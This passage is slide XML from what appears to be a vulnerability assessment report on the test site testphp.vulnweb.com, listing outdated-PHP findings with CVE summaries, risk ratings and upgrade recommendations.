                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>upgrade to PHP version 7.3.24 or later.</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233" name="Google Shape;233;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7236823" y="2987040"/>
            <a:ext cx="496389" cy="441960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF00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234" name="Google Shape;234;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9204960" y="2987040"/>
            <a:ext cx="496389" cy="44196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235" name="Google Shape;235;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10903131" y="2987040"/>
            <a:ext cx="518160" cy="44196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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="625710" y="927027"/>
            <a:ext cx="6877119" cy="64008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3A3838"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t>PHP &lt; 7.3.24 Multiple Vulnerabilities</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="241" name="Google Shape;241;p25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522514" y="1567108"/>
            <a:ext cx="10946675" cy="2647842"/>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rgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>VULNERABILITY TEST RESULT:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>URL : http://testphp.vulnweb.com/ (5.1.6 underhttp://testphp.vulnweb.com/secured/phpinfo.php) </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Installed version : 5.1.6 </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Fixed version : 7.3.24</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1400">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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="556042" y="900902"/>
            <a:ext cx="6877119" cy="64008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3A3838"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t>10. PHP 5.x &lt; 5.2 Multiple Vulnerabilities</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="247" name="Google Shape;247;p26"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="274320" y="1435608"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1" firstRow="1">
                <a:noFill/>
                <a:tableStyleId>{28809880-DC93-42FB-976C-2E7F37E6F614}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="11663675"/>
              </a:tblGrid>
              <a:tr h="423675">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>OBSERVATION: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1117600">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>According to its banner, the version of PHP 5.x installed on the remote host is older than 5.2. Such versions may be affected by several buffer overflows.</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1800"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>To exploit these issues, an attacker would need the ability to upload an arbitrary PHP script on the remote server or to manipulate several variables processed by some PHP functions such as 'htmlentities().'</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47050">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>RISK:                                                        </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>                                HIGH                 MEDIUM                  LOW</a:t>
                      </a:r>
                      <a:endParaRPr b="1"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1168400">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1800"/>
                        <a:buFont typeface="Quattrocento Sans"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>The attacker can exploit this issue by uploading an arbitrary PHP script on the remote server or manipulate several variables processed by some PHP functions such as 'htmlentities().'</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36875">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800"/>
                        <a:t>RECOMMENDATIONS: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1452875">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>We recommend to </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>upgrade to PHP version 5.2.0 or later.</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248" name="Google Shape;248;p26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7271657" y="3056709"/>
            <a:ext cx="531223" cy="435428"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF00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249" name="Google Shape;249;p26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9231086" y="3056709"/>
            <a:ext cx="531223" cy="435428"/>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250" name="Google Shape;250;p26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10920549" y="3056709"/>
            <a:ext cx="531223" cy="435428"/>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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="625710" y="883484"/>
            <a:ext cx="6877119" cy="64008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3A3838"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t>PHP 5.x &lt; 5.2 Multiple Vulnerabilities</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="256" name="Google Shape;256;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="949234" y="1654629"/>
            <a:ext cx="10075817" cy="3614057"/>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257" name="Google Shape;257;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1323703" y="2194733"/>
            <a:ext cx="8822928" cy="2215991"/>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333333"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="333333"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>VULNERABILITY TEST RESULT:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>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333333"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="333333"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Courier"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Version source : http://testphp.vulnweb.com/secured/phpinfo.php </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="333333"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Courier"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Installed version : 5.1.6 </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="333333"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Courier"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Fixed version : 5.2</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t>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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="627857" y="935736"/>
            <a:ext cx="6877119" cy="64008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3A3838"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t>11. PHP 5.x &lt; 5.2.2 Multiple vulnerabilities</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="263" name="Google Shape;263;p28"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="278674" y="1341120"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1" firstRow="1">
                <a:noFill/>
                <a:tableStyleId>{28809880-DC93-42FB-976C-2E7F37E6F614}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="11647000"/>
              </a:tblGrid>
              <a:tr h="358375">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>OBSERVATION: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2238100">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1400">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>According to its banner, the version of PHP 5.x installed on the remote host is older than 5.2.2. It is, therefore, affected by multiple vulnerabilities:</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1400">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>- A heap-based buffer overflow vulnerability was found in PHP's gd extension. A script that could be forced to process WBMP images from an untrusted source could result in arbitrary code execution. (CVE-2007-1001)</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1400">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>- A vulnerability in the way the mbstring extension setglobal variables was discovered where a script using the mb_parse_str() function to set global variables could be forced to to enable the register_globals configuration option, possibly resulting in global variable injection. (CVE-2007-1583)</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1400">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>- A context-dependent attacker could read portions of heap memory by executing certain scripts with a serialized data input string beginning with 'S:', which did not properly track the number of input bytes being processed. (CVE-2007-1649)</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1400">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>- A vulnerability in how PHP's mail() function processed email messages, truncating potentially important information after the first ASCIIZ (\0) byte.(CVE-2007-1717)</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1400">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>- A vulnerability in how PHP's mail() function processed header data was discovered. (CVE-2007-1718).</a:t>
                      </a:r>
                      <a:endParaRPr sz="14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58375">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>RISK:                                                        </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>                                  HIGH                  MEDIUM                  LOW</a:t>
                      </a:r>
                      <a:endParaRPr b="1"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780925">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>The remote attacker can send bulk email to unintended recipients if a script sent mail using a subject header containing a string from an untrusted source.</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58375">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800"/>
                        <a:t>RECOMMENDATIONS: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747425">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
